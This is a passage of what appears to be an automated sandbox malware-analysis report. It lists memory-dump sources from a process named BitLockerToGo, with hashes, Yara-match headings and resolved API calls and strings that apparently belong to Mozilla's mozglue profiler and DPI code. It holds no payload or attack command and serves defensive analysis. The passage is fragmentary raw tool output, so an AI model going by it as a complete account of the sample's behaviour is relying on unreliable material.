                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                • Opcode ID: d4d25b41a61a1fee257a527bf00730c033abe54baf59d138ef395e5928b87eca
                                                                                                                                                                • Instruction ID: 0945a1b23e05f3b09d5f11e4d2124353e5e6bb6b16ef1894da03d51f5acee3cc
                                                                                                                                                                • Opcode Fuzzy Hash: d4d25b41a61a1fee257a527bf00730c033abe54baf59d138ef395e5928b87eca
                                                                                                                                                                • Instruction Fuzzy Hash: 679002613931004E9725A774990964D26D05F985067520860B512C9009DB58C0549912
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                                                                                                                • Instruction ID: 5952d381215b48e35a9a75b1edaae97f16cf49d6ae5f822d4713676fb004bb37
                                                                                                                                                                • Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                                                                                                                • Instruction Fuzzy Hash: ED32E971E006198FDB14CF99C890AADFBF2FF89304F548169C549A7746E731A986CF90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                                • Instruction ID: c96e37a84a7136aa27fc243c7dfb0e053e740c0ca71eb682cf6ab39e8a62b23d
                                                                                                                                                                • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                                • Instruction Fuzzy Hash: 8B221771E0461ACFDB14CF99C894AADF7B2FF88304F548299D54AA7705E731A986CF80
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: a79c07b11e75222073ccbbaa173b8d80f3f09f511219aa906958b3fa8da0ae57
                                                                                                                                                                • Instruction ID: 878ddddecfdbcec5276b4279a223a7261b4756dd81f8a201320335b3b0edce37
                                                                                                                                                                • Opcode Fuzzy Hash: a79c07b11e75222073ccbbaa173b8d80f3f09f511219aa906958b3fa8da0ae57
                                                                                                                                                                • Instruction Fuzzy Hash: A8F11671A087454FD700CF28C8907AABBF2AFCB318F158A6DE4D487791F77499458792
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                                                                                                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryW.KERNEL32(user32,?,6CCAE1A5), ref: 6CCD5606
                                                                                                                                                                • LoadLibraryW.KERNEL32(gdi32,?,6CCAE1A5), ref: 6CCD560F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CCD5633
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CCD563D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CCD566C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CCD567D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CCD5696
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CCD56B2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CCD56CB
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CCD56E4
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CCD56FD
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CCD5716
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CCD572F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CCD5748
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CCD5761
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CCD577A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CCD5793
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CCD57A8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CCD57BD
                                                                                                                                                                • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CCD57D5
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CCD57EA
                                                                                                                                                                • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CCD57FF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                                • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                • API String ID: 2238633743-1964193996
                                                                                                                                                                • Opcode ID: d001178a5c4772b0bf9c2ddeff44c5427319381d47c36629161f99a68b60c983
                                                                                                                                                                • Instruction ID: df0535154ad5fcc1856863e1a923ed068bd49b1f5502e41a3ac067bf8f8ebe67
                                                                                                                                                                • Opcode Fuzzy Hash: d001178a5c4772b0bf9c2ddeff44c5427319381d47c36629161f99a68b60c983
                                                                                                                                                                • Instruction Fuzzy Hash: 06511DB0A11707AFEB019F39AD54D2A3AF9EF06745711442AAA71E2A42FF70DC45CF60
                                                                                                                                                                APIs
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CC8582D), ref: 6CCBCC27
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CC8582D), ref: 6CCBCC3D
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCEFE98,?,?,?,?,?,6CC8582D), ref: 6CCBCC56
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CC8582D), ref: 6CCBCC6C
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CC8582D), ref: 6CCBCC82
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CC8582D), ref: 6CCBCC98
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC8582D), ref: 6CCBCCAE
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CCBCCC4
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CCBCCDA
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CCBCCEC
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CCBCCFE
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CCBCD14
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CCBCD82
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CCBCD98
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CCBCDAE
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CCBCDC4
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CCBCDDA
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CCBCDF0
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CCBCE06
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CCBCE1C
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CCBCE32
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CCBCE48
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CCBCE5E
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CCBCE74
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CCBCE8A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strcmp
                                                                                                                                                                • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                • API String ID: 1004003707-2809817890
                                                                                                                                                                • Opcode ID: ae07f7dba0a27a581db17b172a7c235255d217d6cf5c23a8faa9e0275e51f109
                                                                                                                                                                • Instruction ID: 708424c41f949fb0f4212677df5c1f20e6aa7766d080a4bba91e31a2e796eea6
                                                                                                                                                                • Opcode Fuzzy Hash: ae07f7dba0a27a581db17b172a7c235255d217d6cf5c23a8faa9e0275e51f109
                                                                                                                                                                • Instruction Fuzzy Hash: F551A9D5B4532552FE0032BAAD10BEE2845FF5724AF104476ED39B5E80FB24A60A86B7
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CC84730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC844B2,6CCFE21C,6CCFF7F8), ref: 6CC8473E
                                                                                                                                                                  • Part of subcall function 6CC84730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC8474A
                                                                                                                                                                • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CC844BA
                                                                                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CC844D2
                                                                                                                                                                • InitOnceExecuteOnce.KERNEL32(6CCFF80C,6CC7F240,?,?), ref: 6CC8451A
                                                                                                                                                                • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC8455C
                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 6CC84592
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(6CCFF770), ref: 6CC845A2
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000008), ref: 6CC845AA
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000018), ref: 6CC845BB
                                                                                                                                                                • InitOnceExecuteOnce.KERNEL32(6CCFF818,6CC7F240,?,?), ref: 6CC84612
                                                                                                                                                                • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CC84636
                                                                                                                                                                • LoadLibraryW.KERNEL32(user32.dll), ref: 6CC84644
                                                                                                                                                                • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC8466D
                                                                                                                                                                • VerSetConditionMask.NTDLL ref: 6CC8469F
                                                                                                                                                                • VerSetConditionMask.NTDLL ref: 6CC846AB
                                                                                                                                                                • VerSetConditionMask.NTDLL ref: 6CC846B2
                                                                                                                                                                • VerSetConditionMask.NTDLL ref: 6CC846B9
                                                                                                                                                                • VerSetConditionMask.NTDLL ref: 6CC846C0
                                                                                                                                                                • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC846CD
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 6CC846F1
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CC846FD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                • API String ID: 1702738223-3894940629
                                                                                                                                                                • Opcode ID: 02d1e5c19c21ae4d7b8b330f4c1bcf840a63d04b823e7534810e3e9d3cd71afd
                                                                                                                                                                • Instruction ID: 9a9f3d23f9e4021dd0b92b82fee6eef6f7626474334a5e571dc1b6c27f2960eb
                                                                                                                                                                • Opcode Fuzzy Hash: 02d1e5c19c21ae4d7b8b330f4c1bcf840a63d04b823e7534810e3e9d3cd71afd
                                                                                                                                                                • Instruction Fuzzy Hash: 8761F3B0601348AFEB10CF61E859B9ABBF8EF4730CF048559E5249B681F7748945CBA1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC84A68), ref: 6CCB945E
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCB9470
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCB9482
                                                                                                                                                                  • Part of subcall function 6CCB9420: __Init_thread_footer.LIBCMT ref: 6CCB949F
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBF70E
                                                                                                                                                                • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CCBF8F9
                                                                                                                                                                  • Part of subcall function 6CC86390: GetCurrentThreadId.KERNEL32 ref: 6CC863D0
                                                                                                                                                                  • Part of subcall function 6CC86390: AcquireSRWLockExclusive.KERNEL32 ref: 6CC863DF
                                                                                                                                                                  • Part of subcall function 6CC86390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC8640E
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CCBF93A
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBF98A
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBF990
                                                                                                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCBF994
                                                                                                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCBF716
                                                                                                                                                                  • Part of subcall function 6CCB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCB94EE
                                                                                                                                                                  • Part of subcall function 6CCB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCB9508
                                                                                                                                                                  • Part of subcall function 6CC7B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CC7B5E0
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBF739
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CCBF746
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBF793
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCF385B,00000002,?,?,?,?,?), ref: 6CCBF829
                                                                                                                                                                • free.MOZGLUE(?,?,00000000,?), ref: 6CCBF84C
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CCBF866
                                                                                                                                                                • free.MOZGLUE(?), ref: 6CCBFA0C
                                                                                                                                                                  • Part of subcall function 6CC85E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC855E1), ref: 6CC85E8C
                                                                                                                                                                  • Part of subcall function 6CC85E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC85E9D
                                                                                                                                                                  • Part of subcall function 6CC85E60: GetCurrentThreadId.KERNEL32 ref: 6CC85EAB
                                                                                                                                                                  • Part of subcall function 6CC85E60: GetCurrentThreadId.KERNEL32 ref: 6CC85EB8
                                                                                                                                                                  • Part of subcall function 6CC85E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC85ECF
                                                                                                                                                                  • Part of subcall function 6CC85E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CC85F27
                                                                                                                                                                  • Part of subcall function 6CC85E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CC85F47
                                                                                                                                                                  • Part of subcall function 6CC85E60: GetCurrentProcess.KERNEL32 ref: 6CC85F53
                                                                                                                                                                  • Part of subcall function 6CC85E60: GetCurrentThread.KERNEL32 ref: 6CC85F5C
                                                                                                                                                                  • Part of subcall function 6CC85E60: GetCurrentProcess.KERNEL32 ref: 6CC85F66
                                                                                                                                                                  • Part of subcall function 6CC85E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC85F7E
                                                                                                                                                                • free.MOZGLUE(?), ref: 6CCBF9C5
                                                                                                                                                                • free.MOZGLUE(?), ref: 6CCBF9DA
                                                                                                                                                                Strings
                                                                                                                                                                • [D %d/%d] profiler_register_thread(%s), xrefs: 6CCBF71F
                                                                                                                                                                • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CCBF9A6
                                                                                                                                                                • Thread , xrefs: 6CCBF789
                                                                                                                                                                • " attempted to re-register as ", xrefs: 6CCBF858
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                                • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                                • API String ID: 882766088-1834255612
                                                                                                                                                                • Opcode ID: 7d5fc14877c1f4354b6d9c522a424ba04262a4a8307d17494fa91cf1f013fd41
                                                                                                                                                                • Instruction ID: 6e484e34324dcf216445468b5c3035f1435b34570d366c62a9a87b0d6d9f0ebd
                                                                                                                                                                • Opcode Fuzzy Hash: 7d5fc14877c1f4354b6d9c522a424ba04262a4a8307d17494fa91cf1f013fd41
                                                                                                                                                                • Instruction Fuzzy Hash: 43811379A043049FDB10DF64C840AAEBBB5FF85308F44456DE859ABB51FB31D849CBA2
                                                                                                                                                                APIs
